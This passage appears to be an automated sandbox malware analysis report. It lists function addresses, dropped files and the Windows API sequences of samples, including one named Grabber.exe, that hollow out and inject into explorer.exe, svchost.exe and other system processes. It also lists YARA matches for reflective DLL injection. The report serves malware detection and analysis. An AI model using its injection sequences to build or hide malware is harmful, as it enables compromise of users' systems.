                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794832048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,1_2_00007FF794832048
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,7_2_0E8B1370
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD52048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,11_2_00007FF7DBD52048
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD612200_2_00007FF79CD61220
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD671BC0_2_00007FF79CD671BC
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD660B80_2_00007FF79CD660B8
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF7948320481_2_00007FF794832048
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483345C1_2_00007FF79483345C
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_0040C8982_2_0040C898
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_0040E9502_2_0040E950
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004109102_2_00410910
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004109D92_2_004109D9
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004105E02_2_004105E0
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004115802_2_00411580
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004109932_2_00410993
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004106002_2_00410600
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_0040B3472_2_0040B347
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_0040F3C82_2_0040F3C8
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B345C6_2_00007FF7E52B345C
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B20486_2_00007FF7E52B2048
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B9A0D87_2_08B9A0D8
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771F37_2_08B771F3
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771FD7_2_08B771FD
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771E17_2_08B771E1
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771EB7_2_08B771EB
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771D77_2_08B771D7
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771CD7_2_08B771CD
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B771407_2_08B77140
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B9BAB07_2_08B9BAB0
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B70BF07_2_08B70BF0
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B91B247_2_08B91B24
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B9C3047_2_08B9C304
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B994F87_2_08B994F8
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B9DC327_2_08B9DC32
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B944207_2_08B94420
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B91DBC7_2_08B91DBC
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B845E07_2_08B845E0
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B8FD287_2_08B8FD28
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B9D5007_2_08B9D500
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B8F6E87_2_08B8F6E8
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B98ED47_2_08B98ED4
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B766C07_2_08B766C0
                  Source: C:\Windows\explorer.exeCode function: 7_2_08B947D07_2_08B947D0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B17F07_2_0E8B17F0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B72C07_2_0E8B72C0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8C51E07_2_0E8C51E0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8DC6B07_2_0E8DC6B0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8DCF047_2_0E8DCF04
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D27247_2_0E8D2724
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8DACD87_2_0E8DACD8
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7DCD7_2_0E8B7DCD
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7DD77_2_0E8B7DD7
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7DEB7_2_0E8B7DEB
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7DE17_2_0E8B7DE1
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7DFD7_2_0E8B7DFD
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7DF37_2_0E8B7DF3
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B7D407_2_0E8B7D40
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D9AD47_2_0E8D9AD4
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D02E87_2_0E8D02E8
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D53D07_2_0E8D53D0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8DA0F87_2_0E8DA0F8
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D50207_2_0E8D5020
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8DE8327_2_0E8DE832
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D29BC7_2_0E8D29BC
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8DE1007_2_0E8DE100
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D09287_2_0E8D0928
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeCode function: 10_2_016FDC7410_2_016FDC74
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5345C11_2_00007FF7DBD5345C
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD5204811_2_00007FF7DBD52048
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B345C13_2_00007FF7A91B345C
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B204813_2_00007FF7A91B2048
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE345C14_2_00007FF775AE345C
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE204814_2_00007FF775AE2048
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3FBD820_2_00007FF641F3FBD8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F45C7420_2_00007FF641F45C74
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2100020_2_00007FF641F21000
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F40B8420_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F433BC20_2_00007FF641F433BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F373F420_2_00007FF641F373F4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F30C6420_2_00007FF641F30C64
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3148420_2_00007FF641F31484
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F32CC420_2_00007FF641F32CC4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F4518C20_2_00007FF641F4518C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F391B020_2_00007FF641F391B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3D20020_2_00007FF641F3D200
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F48A3820_2_00007FF641F48A38
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F30A6020_2_00007FF641F30A60
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3128020_2_00007FF641F31280
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F37AAC20_2_00007FF641F37AAC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F28B2020_2_00007FF641F28B20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2979B20_2_00007FF641F2979B
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F29FCD20_2_00007FF641F29FCD
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3504020_2_00007FF641F35040
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3107420_2_00007FF641F31074
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3D88020_2_00007FF641F3D880
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F328C020_2_00007FF641F328C0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3CD6C20_2_00007FF641F3CD6C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F295FB20_2_00007FF641F295FB
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F30E7020_2_00007FF641F30E70
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F44F1020_2_00007FF641F44F10
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F42F2020_2_00007FF641F42F20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F4572820_2_00007FF641F45728
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F31F3020_2_00007FF641F31F30
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F3FBD820_2_00007FF641F3FBD8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F45C7421_2_00007FF641F45C74
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2100021_2_00007FF641F21000
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F44F1021_2_00007FF641F44F10
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F40B8421_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F433BC21_2_00007FF641F433BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3FBD821_2_00007FF641F3FBD8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F373F421_2_00007FF641F373F4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F30C6421_2_00007FF641F30C64
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3148421_2_00007FF641F31484
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F32CC421_2_00007FF641F32CC4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F4518C21_2_00007FF641F4518C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F391B021_2_00007FF641F391B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3D20021_2_00007FF641F3D200
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F48A3821_2_00007FF641F48A38
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F30A6021_2_00007FF641F30A60
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3128021_2_00007FF641F31280
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F37AAC21_2_00007FF641F37AAC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F28B2021_2_00007FF641F28B20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2979B21_2_00007FF641F2979B
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F29FCD21_2_00007FF641F29FCD
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3504021_2_00007FF641F35040
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3107421_2_00007FF641F31074
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3D88021_2_00007FF641F3D880
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F328C021_2_00007FF641F328C0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3CD6C21_2_00007FF641F3CD6C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F295FB21_2_00007FF641F295FB
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F30E7021_2_00007FF641F30E70
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F42F2021_2_00007FF641F42F20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F4572821_2_00007FF641F45728
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F31F3021_2_00007FF641F31F30
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F3FBD821_2_00007FF641F3FBD8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8372A6821_2_00007FF8B8372A68
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831DAC021_2_00007FF8B831DAC0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8305B5C21_2_00007FF8B8305B5C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830FBE021_2_00007FF8B830FBE0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8372C4821_2_00007FF8B8372C48
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8367BFC21_2_00007FF8B8367BFC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83A5E6421_2_00007FF8B83A5E64
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83A8DF821_2_00007FF8B83A8DF8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8330E1521_2_00007FF8B8330E15
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830FF6021_2_00007FF8B830FF60
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8302FA021_2_00007FF8B8302FA0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832F00021_2_00007FF8B832F000
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830D03021_2_00007FF8B830D030
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83900BC21_2_00007FF8B83900BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831D12021_2_00007FF8B831D120
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830327421_2_00007FF8B8303274
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832120021_2_00007FF8B8321200
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83262D021_2_00007FF8B83262D0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830C36021_2_00007FF8B830C360
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831030021_2_00007FF8B8310300
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830831021_2_00007FF8B8308310
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830233C21_2_00007FF8B830233C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832238421_2_00007FF8B8322384
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B832C42921_2_00007FF8B832C429
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830F52021_2_00007FF8B830F520
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B831F5A421_2_00007FF8B831F5A4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83116D021_2_00007FF8B83116D0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B834274021_2_00007FF8B8342740
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83026F821_2_00007FF8B83026F8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B830885421_2_00007FF8B8308854
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B83128B021_2_00007FF8B83128B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB63CF021_2_00007FF8BFB63CF0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB637B021_2_00007FF8BFB637B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB61A8021_2_00007FF8BFB61A80
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB6521C21_2_00007FF8BFB6521C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB6263021_2_00007FF8BFB62630
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB61A8021_2_00007FF8BFB61A80
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB6314021_2_00007FF8BFB63140
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB62D3021_2_00007FF8BFB62D30
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB76AE421_2_00007FF8BFB76AE4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB72DD021_2_00007FF8BFB72DD0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB971CC21_2_00007FF8BFB971CC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB9D13021_2_00007FF8BFB9D130
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe 94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                  Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF7E52B1050 appears 106 times
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: String function: 00007FF7DBD51050 appears 106 times
                  Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF775AE1050 appears 106 times
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: String function: 00007FF641F225F0 appears 100 times
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: String function: 00007FF641F22760 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: String function: 00007FF794831050 appears 106 times
                  Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF7A91B1050 appears 106 times
                  Source: api-ms-win-crt-conio-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-2-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.20.drStatic PE information: No import functions for PE file found
                  Source: K6qneGSDSB.exe, 00000000.00000000.2043068807.00007FF79CD79000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs K6qneGSDSB.exe
                  Source: K6qneGSDSB.exe, 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs K6qneGSDSB.exe
                  Source: K6qneGSDSB.exeBinary or memory string: OriginalFilenameServices.exe2 vs K6qneGSDSB.exe
                  Source: 7.3.explorer.exe.ca53600.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.e8b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.8b70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.ca53600.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 6.2.svchost.exe.251e2e7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.0.explorer.exe.8b70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
